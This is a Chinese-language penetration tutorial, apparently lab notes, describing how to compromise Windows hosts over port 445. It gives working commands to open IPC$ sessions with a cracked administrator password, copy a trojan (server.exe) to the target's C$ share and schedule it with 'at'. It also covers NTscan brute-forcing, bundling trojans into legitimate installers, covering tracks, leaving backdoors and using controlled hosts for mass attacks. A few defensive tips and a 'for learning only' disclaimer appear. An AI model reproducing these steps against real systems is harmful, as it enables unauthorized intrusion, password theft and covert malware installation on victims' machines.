渗透简单流程

  1. 信息收集 nslookup,whois
  2. 扫描漏洞 namp=ip范围 端口 80 scanport 网站漏洞
  3. 漏洞利用
  4. 提权(shell环境,桌面环境,最高权限)
  5. 毁尸灭迹
  6. 留后门
  7. 渗透测试报告

手工测试端口号开放

  • telnet手工测试
:: 如果端口开放和端口关闭会呈现不同的效果
telnet IP地址 测试端口
  • scanport扫描445端口

利用IPC$漏洞暴力破解

  • 可以利用NTscan进行暴力破解,原理是利用445端口
net use \\10.1.1.2\ipc$ sty137. /user:administrator

:: 挂载远程目录到f盘
net use f: \\10.1.1.2\share sty137. /user:administrator

:: 卸载f盘远程目录
net use f: /del

:: 卸载所有远程目录
net use * /del

:: 挂载远程目录到f盘
net use f: \\10.1.1.2\c$ sty137. /user:administrator
  • net use命令挂载和卸载远程目录

QQ截图20201125155916.png

QQ截图20201125155937.png

木马概述

  • 木马通常称为黑客程序,恶意代码,也称为特洛伊木马.
  • 基于远程控制的黑客工具

木马的组成

  • 客户端程序是安装在攻击者(黑客)方的控制台,它负责远程遥控指挥
  • 服务器端程序即是木马程序,它被隐藏安装在被攻击(受害)方的电脑上,目标主机也称为肉鸡

木马的危害

  • 盗取用户信息,如:网游账户,网银信息,QQ密码等
  • 占用系统资源,降低电脑效能
  • 将本机作为工具来攻击其他设备,也称为肉鸡

中了木马的征兆

  • 硬盘不停的读写
  • 鼠标键盘不听使唤
  • 窗口突然被关闭
  • 新的窗口莫名其妙地打开

木马传播途径

  • 网页浏览时利用浏览器漏洞或浏览器插件(Flash,迅雷等)漏洞
  • 通过QQ,MSN等即时通讯软件,发送恶意网址链接或木马病毒文件
  • 使用U盘等移动存储介质
  • 打开陌生的邮件,通过电子邮件内恶意代码或含木马病毒的附件
  • 伪装成多媒体影音文件或植入木马的应用软件,利用P2P平台和网站传播
  • 利用操作系统漏洞或弱口令直接远程置入
  • 下载来源不明的程序.

法律规定

f3dbef433f7d3aea1713b85256da3780.png

环境介绍

虚拟机

  • WindowsXP----模拟黑客攻击机
  • Windows server 2003----模拟被木马控制方

工具

原理

  • 445端口主要用于远程共享,windows系统默认开启该端口,只要破解目标机器的密码就可以通过该端口传输木马,植入后门并控制
  • 防范方法1: 打开services.msc,并停止及禁用server服务
  • 防范方法2: 禁止被访问445端口,需要禁用tcp和udp两种协议,配置高级安全防火墙-入站规则(在win7及以上系统,win2008及以上系统)
  • 关闭445服务

攻击流程

  1. 通过端口扫描获取开放445端口的主机
  2. 对开放445端口的主机进行暴力破解
  3. 对破解成功的主机发送木马实现控制

实验流程

  • 开启虚拟机,且在同一局域网内,配置IP地址并测试网络连通性

bb2ea972daf7cc4fa1839195eec72536.png

f67ddfffb299ceaf8dc32a1bfb5e868c.png

攻击流程

使用scanport在ip段中扫描目标端口

5bc2ec128bc3b1478a044c65d8fb9218.png

确认172.16.0.1是本机,确认攻击目标是172.16.0.2后使用NTScan暴力破解


  • 工具中有2个文件,一个记录攻击的用户名,另一个是密码字典,实战环境中如果要增加攻击成功率,可以使用其他效率更高的密码字典

8a320baec6fc1a5e69ba8d69dd0123f3.png

  • 445漏洞只能针对设有密码的主机,因为没有密码的主机Windows默认无法登录
  • 控制对方机器后,如果对方机器重启,需要对方登录以后才能继续控制

10cae72b70a9de70f956086dad9643ed.png

  • 破解成功以后,会在目录下生成文件记录破解成功的主机

838f89c9132613745fa9c83a690683e0.png

获取到的帐号密码可以直接通过Windows自带的远程连接进行登录

  • 制作木马

控制端默认8000端口,需要注意防火墙是否拦截

6e2bc545eb46990c01df279ff3a1bba0.png

设置保存位置,准备发送到靶机

a9b3a1bdc863f2ba5bd9b7853d65ecea.png

  • 使用帐号密码发送木马
:: 与目标主机建立IPC$
net use \\172.16.0.2\ipc$ "sty137." /user:administrator
:: 发送木马,发送到对方c盘可以保证发送成功率
copy d:\server.exe \\172.16.0.2\c$\
:: 获取对方电脑时间
net time \\172.16.0.2
:: 设置定时执行木马 建议计划任务时间离当前时间至少5分钟
at \\172.16.0.2 17:17 c:\server.exe
  • 成功控制目标主机

7710f0bb0308ac01b50cb9db7887addc.png

控制成功后,目标主机目录下回出现serverSrv.exe文件,如果登录的用户有足够的权限,可以将文件藏到c:\WINDOWS目录

更进一步制作木马

可以通过其他安装包捆绑木马的方式对靶机植入木马

  • 可以从网上或者其他渠道获取正常的文件,然后将制作好木马和正常的文件进行捆绑

fb050c979b6adcca2159f12265782e89.png

  • 当打开这个捆绑的文件,在执行该文件后,依然正常,但是木马会悄悄植入电脑中

31f7e674dce79fc6dc4fb711262f1e59.png

总结

当你控制了大量的主机,就可以向目标服务器发起大量的攻击,还有各种捆绑,只要执行就会对电脑植入木马,防范措施就是去软件的官网下载,不要随意执行各种软件,以上仅供学习交流